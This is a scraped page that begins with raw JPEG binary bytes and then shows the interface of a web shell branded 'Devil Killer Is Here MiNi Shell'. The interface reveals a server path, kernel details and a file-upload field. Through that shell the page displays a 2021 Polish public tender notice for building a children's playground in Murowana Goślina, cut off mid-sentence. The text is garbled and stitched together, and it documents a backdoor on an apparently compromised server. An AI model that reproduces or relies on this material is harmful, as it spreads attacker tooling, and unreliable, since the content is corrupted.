JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013132701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131327 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA PLACU ZABAW NA STADIONIE MIEJSKIM W MUROWANEJ GOŚLINIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MUROWANA GOŚLINA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258595</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Powstańców Wielkopolskich 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Murowana Goślina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-095</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">618922600</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@murowana-goslina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.murowana-goslina.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA PLACU ZABAW NA STADIONIE MIEJSKIM W MUROWANEJ GOŚLINIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-759e1e46-f062-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131327</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001362/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Budowa placu zabaw na stadionie miejskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.murowana-goslina.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://przetargi.murowana-goslina.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy<br/>zakupowej pod adresem: https://przetargi.murowana-goslina.pl. 2.Zamawiający określa niezbędne<br/>wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej, tj.: a)stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b)komputer klasy PC lub<br/>MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze wersje, c)zainstalowana<br/>dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z<br/>wyjątkiem Internet Explorer, d)włączona obsługa JavaScript, e)zainstalowany program Adobe Acrobat<br/>Reader lub inny lub inny obsługujący pliki w formacie *.pdf.; f)podłączony lub wbudowany do<br/>komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez<br/>Użytkownika lub aplikacja komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).3.<br/>Instrukcja Użytkownika znajduje się na Platformie zakupowej, w zakładce Pomoc.4. Zamawiający<br/>będzie przekazywał informacje takie jak odpowiedzi na pytania, zmiany SWZ, zmiany terminu<br/>składania i otwarcia ofert, za pośrednictwem Platformy zakupowej. 5.Sposoby złożenia oferty za<br/>pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty, zostały opisane w Instrukcji użytkowników Platformy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: a)Administratorem Pani/Pana/Państwa danych osobowych jest Burmistrz Miasta i Gminy Murowana Goślina, plac Powstańców Wielkopolskich 9, 62-095 Murowana Goślina;b)Administratorem Pani/Pana/Państwa danych osobowych jest Burmistrz<br/>Ogłoszenie nr z dnia Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Miasta i Gminy Murowana Goślina, plac Powstańców Wielkopolskich 9, 62-095 Murowana<br/>Goślina;c)dane kontaktowe inspektora ochrony danych: Urząd Miasta i Gminy, plac Powstańców<br/>Wielkopolskich 9, 62-095 Murowana Goślina, e-mail: inspektorochronydanych@murowanagoslina.<br/>pl;d)Odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu ustawę Pzp;e)Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.: „Budowa placu zabaw na stadionie miejskim w Murowanej<br/>Goślinie" nr postępowania: ZP.272.12.2021 prowadzonym w postępowaniu o udzielenie zamówienia klasycznego o wartości mniejszej niż progi unijne, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a po tym czasie przez okres zgodny z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2020 r. poz. 164) lub innymi<br/>szczegółowymi przepisami prawa;f)obowiązek podania przez Pani/Pana/Państwa danych osobowych<br/>bezpośrednio Pani/Pana/ Państwa dotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;g)w odniesieniu do<br/>Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO;h)posiada/posiadają Pani/Pan/Państwo (1)na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących;(2)na podstawie art. 16 RODO<br/>prawo do sprostowania Pani/Pana/Państwa danych osobowych (wyjaśnienie: skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);(3)na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego);(4)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana/Państwa dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">a) nie przysługuje Pani/Panu/Państwu:w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana/Państwa danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. b) Zamawiający ponadto informuje:- w przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia, - skorzystanie przez osobę, której dane<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu oraz jego załączników</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 209606,87 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Zakres przedmiotu zamówienia obejmuje budowę placu zabaw na stadionie miejskim w<br/>Murowanej Goślinie przy ul. Mściszewskiej, na działkach nr: 481/1, 481/2, 479, 482, w ramach<br/>zadania inwestycyjnego pt.: „Budowa placu zabaw na stadionie miejskim”.<br/>2) W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do wykonania:<br/>a) robót pomiarowych geodezyjnych – wytyczenie geodezyjne placu zabaw oraz wykonanie<br/>mapy geodezyjnej powykonawczej,<br/>b) dostawy i montażu nw. urządzeń zabawowych obejmujących:<br/>(1) zestaw zabawowy – 1 kpl. HIC 190 cm, Wykaz elementów:<br/>- 1 podest startowy zjeżdżalni ślimakowej,<br/>- 1 kwadratowy podest zjeżdżalni prostej jednotorowej,<br/>- 2 kwadratowe podesty wieży otwartej,<br/>- 1 trójkątny podest zjeżdżalni jednotorowej prawoskrętnej,<br/>- 1 kwadratowy podest ściany wspinaczkowej z uchwytami,<br/>- 1 trójkątny podest zjeżdżalni dwutorowej,<br/>- 2 wieże z dachem czterospadowym,<br/>- 1 wieża otwarta,<br/>- 1 przejście skośne mostkowe, zadaszone,<br/>- 1 zjeżdżalnia ślimakowa,<br/>- 1 zjeżdżalnia jednotorowa prawoskrętna,<br/>- 1 zjeżdżalnia prosta jednotorowa,<br/>- 1 zjeżdżalnia prosta dwutorowa,<br/>- 1 ścianka wspinaczkowa łukowa z uchwytami,<br/>- 3 elementy dekoracyjne z motywami roślinnymi i/lub zwierzęcymi zamontowane na szczytach<br/>słupów konstrukcyjnych,<br/>- 7 paneli zabawowo-edukacyjnych: jeden z trójwymiarowym obrazem głowy zwierzęcia, sklepik,<br/>ruchome kółka zębate, gra w kółko i krzyżyk, bulaj z elementem przezroczystym, płotek 2 szt.,<br/>- 1 element dekoracyjno-zabawowy zamontowany na słupie konstrukcyjnym.<br/>(2) zestaw sportowy – 1 kpl. - HIC 250 cm. Wykaz elementów:<br/>- 1 łukowa drabinka, czterostopniowa do wejścia na ślizg,<br/>- 1 ślizg skrętny,<br/>- 1 przeplotnia połączona ze ścianką wspinaczkową,<br/>- 1 skośna przeplotnia,<br/>- 1 pozioma przeplotnia na której umieszczono na linach trzy elementy do podciągania,<br/>- konstrukcja zestawu oparta jest na 6 słupach o przekroju okrągłym posadowionych na<br/>prefabrykowanych bloczkach betonowych.<br/>(3) równoważnia na sprężynach – 3 szt.:<br/>(4) skoczki pojedyncze – 6 szt. - HIC 40 cm:<br/>(5) huśtawka – 1 szt. - HIC 150 cm:<br/>(6) element wspinaczkowy w kształcie półkuli – 1 szt. - HIC120 cm<br/>c) dostawy i montażu elementów małej architektury obejmującej:<br/>a) tablice informacyjne – 2 szt.,<br/>b) kosz na śmieci – 3 szt.,<br/>c) ławkę – 8 szt.;<br/>d) wykonania nawierzchni bezpiecznej z mat przerostowych gumowych oraz nawierzchni<br/>bezpiecznej z piasku<br/>e) wykonania ogrodzenia placu zabaw<br/>f) wykonania schodów terenowych oraz chodnika o nawierzchni z miału granitowego, szerokości 1,5m<br/>g) sadzenie krzewów iglastych – posadzenie 22 szt. tui szmaragd o wysokości minimum 1,50 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45236210-5 - Wyrównywanie nawierzchni placów zabaw dla dzieci</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">77300000-3 - Usługi ogrodnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Oferty oceniane będą punktowo. 2. Maksymalna liczba punktów w poszczególnych kryteriach równa jest określonej wadze kryterium w %. 3. Do porównania ofert pod<br/>kątem kryterium oceny ofert stosuje się wzory opisane w SWZ. 4.Łączna maksymalna ilość punktów,<br/>jaką po uwzględnieniu kryteriów może osiągnąć oferta – wynosi 100 punktów. 5. Oferta z najwyższą<br/>ilością punktów – w każdej części przedmiotu zamówienia - zostanie uznana za najkorzystniejszą. 6.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. 7. Szczegółowy opis<br/>oceny ofert zawarto w rozdziale XXII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) dotyczące zdolności technicznej lub zawodowej:<br/>a) dotyczącej Wykonawcy:<br/>Wykonawca musi posiadać doświadczenie polegające na wykonaniu (zakończeniu) w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, co najmniej jednego zadania, którego przedmiotem była budowa<br/>placu zabaw o wartości nie mniejszej niż 200 000 PLN brutto.<br/>Przez jedno zadanie Zamawiający rozumie wykonanie zadania na podstawie jednej umowy.<br/>Uwaga !<br/>W przypadku składania oferty przez konsorcjum Zamawiający wymaga, aby warunek był<br/>spełniony w całości przez co najmniej jeden podmiot (co najmniej jeden lub każdy z podmiotów<br/>musi posiadać wymagane doświadczenie).<br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy)<br/>realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia/wspólnie<br/>realizujących zamówienie (konsorcjum wykonawców), Zamawiający nie dopuszcza by<br/>Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli<br/>faktycznie i konkretnie nie wykonywał wykazanego zakresu robót. Wykonawca ten może<br/>powołać się na doświadczenie grupy Wykonawców, której był członkiem pod warunkiem, że<br/>faktycznie i konkretnie uczestniczył w wymaganym zakresie w realizacji wykazanej<br/>części/elementu zamówienia (Zamawiający żąda wykazania się przez Wykonawcę robotami<br/>budowlanymi rzeczywiście wykonanymi przez Wykonawcę). Jeżeli pojedynczy członek<br/>Konsorcjum chciałby powołać się na doświadczenie całego konsorcjum to powinien skorzystać<br/>ze wsparcia pozostałych jego członków w trybie art. 118 PZP.<br/>Wartość robót w walucie innej niż PLN, Wykonawca powinien przeliczyć na PLN wg średniego<br/>kursu NBP z dnia publikacji ogłoszenia o niniejszym zamówieniu, natomiast w przypadku braku<br/>przeliczenia przez Wykonawcę Zamawiający dokona przeliczenia na PLN wg kursu średniego<br/>NBP na dzień, w którym opublikowano ogłoszenie o niniejszym zamówieniu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, tj. co najmniej<br/>jednego zadania, którego przedmiotem była budowa placu zabaw o wartości nie mniejszej niż 200 000<br/>PLN brutto, wraz z podaniem jego rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na<br/>rzecz których robota ta została wykonana, oraz załączeniem dowodów określających czy ta robota<br/>budowlana została wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego robota budowlana została wykonana, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. Okres 5 lat, o którym mowa powyżej liczy się wstecz od dnia, w którym<br/>upływa termin składania ofert</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t.j. Dz.U. z 2021 r. poz.275), z innym Wykonawca, który złożył odrębną ofertę, ofertę<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do 